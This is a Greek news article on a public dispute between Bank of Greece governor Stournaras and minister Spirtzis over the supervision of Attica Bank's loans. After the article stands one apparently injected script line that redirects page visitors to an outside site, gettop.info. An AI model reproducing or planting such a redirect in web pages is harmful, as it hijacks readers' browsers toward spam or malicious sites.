«Μήνυμα» Στουρνάρα προς Σπίρτζη: Κρείττον του λαλείν το σιγάν

0
7

Ο διοικητής της Τράπεζας της Ελλάδας Γιάννης Στουρνάρας «απάντησε» στις αιχμές του Χρήστου Σπίρτζη για την Attica Bank.

Ο Υπουργός Υποδομών νωρίτερα, απέδωσε ευθύνες στον κ.Στουρνάρα, αλλά ο Διοικητής της ΤτΕ απάντησε μέσω συνεργατών του, οι οποίοι τόνισαν για τον Σπίρτζη «Κρείττον του λαλείν το σιγάν» (η σιωπή είναι καλύτερη από τη φλυαρία).

Νωρίτερα, ο υπουργός Υποδομών Χρήστος Σπίρτζης, μιλώντας στον ραδιοφωνικό σταθμό Real FM είχε επιρρίψει ευθύνες και στον Γιάννη Στουρνάρα για το θέμα των δανείων της Attica Bank.

«Στο διάστημα από το ’11 μέχρι σήμερα, έχουνε γίνει δύο αυξήσεις μετοχικού κεφαλαίου στην Τράπεζα Αττικής. Ο φορέας που ήλεγξε την Τράπεζα για τις διαδικασίες, τα δάνεια, τις αυξήσεις μετοχικού κεφαλαίου και όλα τα υπόλοιπα είναι η Τράπεζα της Ελλάδας», είπε ο κ. Σπίρτζης και πρόσθεσε:

«Και εδώ ζούμε μία παράνοια που πραγματικά προσβάλλει και τους μηχανικούς, προσβάλλει και την Τράπεζα και άρα και τη χώρα. Αν, λοιπόν, η Τράπεζα Αττικής δεν έκανε καλά τη δουλειά της, προφανώς δεν έκανε καλά τη δουλειά της και η Τράπεζα της Ελλάδας που την ήλεγξε. Άρα, αν ισχύουν όλα αυτά, πρέπει να ελεγχθεί και η Τράπεζα της Ελλάδας, κατά τη γνώμη μου».

«Όλα αυτά», συνέχισε ο ίδιος, «εγώ ζητώ να βγουν δημόσια, στη διαφάνεια, ποιοι ελέγχθησαν, τι πορίσματα έχουμε, ποιοι έκαναν τους ελέγχους μέχρι τώρα και τι έβγαλαν τα πορίσματα του SSM, για να καταλάβει όλος ο κόσμος αν αυτά που αναπαράγονται είναι λάσπη στον ανεμιστήρα, αν είναι εν μέρει αληθή, αν είναι τελείως αληθή ή τελείως ψευδή».

Ο κ. Σπίρτζης σημείωσε, επίσης, πως αν ισχύουν αυτά που είδαν το φως της δημοσιότητας αναφορικά με τον κ. Καλογρίτσα, οφείλει η αρμόδια επιτροπή να τον αποκλείσει από τον διαγωνισμό για τις τηλεοπτικές άδειες, προσθέτοντας ότι περιμένει από την Τράπεζα της Ελλάδας να δημοσιοποιήσει το σχετικό πόρισμα.

setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here